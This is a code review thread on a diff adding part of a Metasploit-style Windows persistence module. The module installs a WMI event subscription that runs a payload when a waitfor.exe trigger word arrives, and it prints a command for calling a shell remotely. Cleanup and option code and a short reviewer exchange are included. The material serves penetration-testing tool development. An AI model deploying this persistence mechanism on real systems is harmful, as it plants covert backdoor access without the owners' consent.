modules/exploits/windows/persistence/wmi/wmi_event_subscription_waitfor.rb

```diff
@@ -0,0 +1,131 @@
+      OptString.new('WAITFOR_TRIGGER',
+                    [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]),
+      OptString.new('CLASSNAME',
+                    [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+    ])
+
+    register_advanced_options(
+      [
+        OptString.new('CUSTOM_PS_COMMAND',
+                      [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be enclosed in quotes)', false, ]),
+      ]
+    )
+  end
+
+  def check
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe('This module requires powershell to run') unless have_powershell?
+
+    return CheckCode::Safe('This module requires admin privs to run') unless is_admin?
+
+    return CheckCode::Safe('This module cannot run as System') if is_system?
+
+    return CheckCode::Safe('This module requires UAC to be bypassed first') unless is_high_integrity?
+
+    CheckCode::Appears('Likely exploitable')
+  end
+
+  def install_persistence
+    host = session.session_host
+    print_status('Installing Persistence...')
+    psh_exec(subscription_waitfor)
+    print_good "Persistence installed! Call a shell using \"waitfor.exe /S #{host} /SI #{datastore['WAITFOR_TRIGGER']}\""
+    # wmic will be removed Windows 11, version 25H2 or Windows 11, version 24H2 in favor of powershell
+    # source https://support.microsoft.com/en-us/topic/windows-management-instrumentation-command-line-wmic-removal-from-windows-e9e83c7f-4992-477f-ba1d-96f694b8665d
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"Telemetrics\\\" DELETE\"\n"
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"Telemetrics\\\"' DELETE\"\n"
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __EventFilter WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH CommandLineEventConsumer WHERE Name=\\\"#{name_class}\\\" DELETE\"\n"
+    # @clean_up_rc << "execute -H -f wmic -a \"/NAMESPACE:\\\"\\\\\\\\root\\\\subscription\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\"#{name_class}\\\"' DELETE\""
+    name_class = datastore['CLASSNAME']
+    @clean_up_rc << "execute -H -f powershell -a \"Get-WmiObject -Namespace 'root\\subscription' -Query \\\"SELECT * FROM __EventFilter WHERE Name='Telemetrics'\\\" | ForEach-Object { $_.Delete() }\"\n"
```

Comment:
Do we write `@clean_up_rc` to disk automatically? The original module used:

```ruby
    file_local_write(clean_rc, clean_up_rc)
```

Reply:
Yup, the mixin handles writing it to disk and printing the statement about it